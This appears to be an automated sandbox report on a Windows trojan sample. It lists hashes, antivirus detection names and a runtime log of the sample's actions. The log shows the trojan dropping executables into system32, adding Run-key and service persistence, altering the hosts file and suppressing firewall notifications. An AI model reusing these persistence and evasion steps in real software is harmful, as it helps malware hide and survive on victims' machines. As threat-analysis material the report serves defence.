Analysis Date: 2015-08-13 09:26:36
MD5: 9e279cf2edd0125bb862459ed85b4e28
SHA1: 27e071214ce9411f3119cb20bba289db5fa2b515

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 8b949b9fade7276c657b9cdd8ea0b986 sha1: 97c2932f80f23c0a0964562f29ded87615bc8bbb size: 785920
Section .rdata md5: 9f91c1a7bc86f11a0732c4f1cde40af3 sha1: 0a978aac51750c9d302b142e0bf76479bf17a58c size: 57856
Section .data md5: 14c6134f7b9829cbd73dc9251eb3c489 sha1: d795c6e996b92c22b9f5ed6d29c2731caaad3ca4 size: 391168
Timestamp: 2014-07-24 03:10:03
Packer: Microsoft Visual C++ ?.?
PEhash: d4c169ab55d09a42c21b72c4064cb5dc9e8c833f
IMPhash: 11c08bde9052f29c5b863595154b187a
AV Rising: no_virus
AV CA (E-Trust Ino): no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV Dr. Web: no_virus
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV BullGuard: Gen:Variant.Symmi.22722
AV Padvish: no_virus
AV VirusBlokAda (vba32): no_virus
AV CAT (quickheal): no_virus
AV Trend Micro: TROJ_WONTON.SMJ1
AV Kaspersky: Trojan.Win32.Generic
AV Zillya!: no_virus
AV Emsisoft: Gen:Variant.Symmi.22722
AV Ikarus: no_virus
AV Frisk (f-prot): no_virus
AV Authentium: W32/Nivdort.A.gen!Eldorado
AV MalwareBytes: no_virus
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.AE
AV K7: no_virus
AV BitDefender: Gen:Variant.Symmi.22722
AV Fortinet: W32/Kryptik.DDQD!tr
AV Symantec: Downloader.Upatre!g15
AV Grisoft (avg): Win32/Cryptor
AV Eset (nod32): Win32/Kryptik.CCLE
AV Alwil (avast): no_virus
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Twister: no_virus
AV Avira (antivir): TR/Crypt.Xpack.14701
AV Mcafee: no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\WINDOWS\system32\vipagashcugul\tst
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\oxs1as1liqt3zgbzllsp.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\oxs1as1liqt3zgbzllsp.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\oxs1as1liqt3zgbzllsp.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Interactive Shell Discovery UserMode UPnP ➝ C:\WINDOWS\system32\pkaplnprsbsz.exe
Creates File: C:\WINDOWS\system32\pkaplnprsbsz.exe
Creates File: C:\WINDOWS\system32\drivers\etc\hosts
Creates File: C:\WINDOWS\system32\vipagashcugul\tst
Creates File: C:\WINDOWS\system32\vipagashcugul\etc
Creates File: C:\WINDOWS\system32\vipagashcugul\lck
Deletes File: C:\WINDOWS\system32\\drivers\etc\hosts
Creates Process: C:\WINDOWS\system32\pkaplnprsbsz.exe
Creates Service: Volume Drive WebClient Thread - C:\WINDOWS\system32\pkaplnprsbsz.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 800

Process
↳ Pid 848

Process
↳ C:\WINDOWS\System32\svchost.exe

Creates File: pipe\PCHFaultRepExecPipe

Process
↳ Pid 1204

Process
↳ Pid 1328

Process
↳ Pid 1864

Process
↳ Pid 1128

Process
↳ C:\WINDOWS\system32\pkaplnprsbsz.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify ➝ 1
Creates File: C:\WINDOWS\system32\vipagashcugul\lck
Creates File: C:\WINDOWS\system32\vipagashcugul\rng
Creates File: C:\WINDOWS\system32\joiikxvujea.exe
Creates File: C:\WINDOWS\system32\vipagashcugul\tst
Creates File: pipe\net\NtControlPipe10
Creates File: C:\WINDOWS\TEMP\oxs1as1saot3z.exe
Creates File: C:\WINDOWS\system32\vipagashcugul\run
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\system32\vipagashcugul\cfg
Creates Process: C:\WINDOWS\TEMP\oxs1as1saot3z.exe -r 39889 tcp
Creates Process: WATCHDOGPROC "c:\windows\system32\pkaplnprsbsz.exe"

Process
↳ C:\WINDOWS\system32\pkaplnprsbsz.exe

Creates File: C:\WINDOWS\system32\vipagashcugul\tst

Process
↳ WATCHDOGPROC "c:\windows\system32\pkaplnprsbsz.exe"

Creates File: C:\WINDOWS\system32\vipagashcugul\tst

Process
↳ C:\WINDOWS\TEMP\oxs1as1saot3z.exe -r 39889 tcp

Creates File: \Device\Afd\Endpoint
Winsock DNS: 239.255.255.250

Network Details:


Raw Pcap
Strings